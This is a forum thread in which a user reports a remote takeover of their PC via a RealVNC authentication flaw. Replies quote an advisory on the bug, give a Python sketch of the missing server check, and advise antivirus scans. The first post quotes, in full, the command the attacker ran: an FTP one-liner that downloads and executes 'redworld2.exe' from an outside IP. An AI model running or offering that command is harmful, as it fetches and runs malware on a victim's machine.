Have I just been hacked?

Phire

Weird thing happened recently...

I was minding my own business when suddenly my start button was pressed without me pressing anything... then the "Run..." dialog box opened... and this was pasted inside: "cmd /c echo OPEN 80.121.107.111 9382>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit" ... and then the cmd.exe window popped open and said it opened my binary mode data connection.

WTF is redworld? Virus? Trojan?

Edit: Did some research and found out it has something to do with the software "VNC 4.1.1". Anyone care to delve deeper into this weird problem?
 
VNC is a remote desktop software. I would check if you have it installed on your computer.
 
A security hole has surfaced in a program IT administrators use to access remote machines, but fixes are available.

A flaw in the authentication process of RealVNC (Virtual Network Computing) software could allow attackers to gain remote access to an affected VNC server and compromise it, Cupertino, Calif.-based AV giant Symantec Corp. warned in a message to customers of its DeepSight Threat Management System.

"During the initial handshake and authentication process between VNC clients and servers, a list of authentication methods is sent to clients," Symantec said. "The client chooses a method and returns a byte specifying the method it wishes to continue with."

The flaw appears because the server doesn't properly validate that the requested method sent by the client is actually one of the methods allowed by the server. "This issue allows remote attackers to request an anonymous authentication method, which will be incorrectly accepted by the server," Symantec said. "This allows them to gain full control of the VNC server session."

However, there is a fix for this issue, or it is the upgrade. I haven't tested it or read it completely.
http://searchsecurity.techtarget.com...188531,00.html
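The server-side check the Symantec text says was missing, shown beside the flawed behaviour, as an added example that is not part of the original post and is not RealVNC's code. It assumes the standard RFB security-type codes (1 = None, 2 = VNC Authentication); the function names and the sample configuration are hypothetical.

```python
"""Server-side handling of the RFB security-type byte (added example)."""

SEC_NONE = 1       # RFB "None": no authentication at all
SEC_VNC_AUTH = 2   # RFB "VNC Authentication": password challenge/response


def offer(allowed):
    """Bytes the server sends: a count, then the security types it allows."""
    return bytes([len(allowed)]) + bytes(allowed)


def select_flawed(allowed, reply):
    """Behaviour described in the advisory: the client's byte is trusted as-is."""
    return reply[0]


def select_checked(allowed, reply):
    """Accept the reply only if it is one byte naming a type the server offered."""
    if len(reply) != 1:
        raise ValueError("security-type reply must be exactly one byte")
    chosen = reply[0]
    if chosen not in allowed:
        raise PermissionError(f"type {chosen} was not offered; close connection")
    return chosen


def handle(select, allowed, reply):
    """Return (accepted, password_required) for one handshake reply."""
    try:
        chosen = select(allowed, reply)
    except (ValueError, PermissionError, IndexError):
        return (False, False)
    return (True, chosen != SEC_NONE)


if __name__ == "__main__":
    allowed = [SEC_VNC_AUTH]  # constructed config: password auth only
    print("server offer:", offer(allowed).hex())
    # Constructed replies: an offered type, a type never offered, an empty reply.
    for name, select in (("flawed", select_flawed), ("checked", select_checked)):
        for reply in (bytes([SEC_VNC_AUTH]), bytes([SEC_NONE]), b""):
            print(name, reply.hex() or "(empty)", handle(select, allowed, reply))
```

With the flawed selector, a reply naming a type the server never offered is accepted and no password is required; the checked selector rejects it before any session state is created.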
 
VNC stands for Virtual Network Computing. It's basically a Remote Access Tool that lets you connect to a network over the internet. It's useful to allow people that work in a corporate environment to work from home. Because of the nature of these programs, they can be exploited to be used for trojans and such. Unless you use one of these programs for work, you probably have been infected with a trojan of some sort. Assuming you have antivirus/spyware, do a full system scan.

Doing a quick Google for redworld2.exe just confirmed that it is definitely malware. Scan for viruses ASAP.
 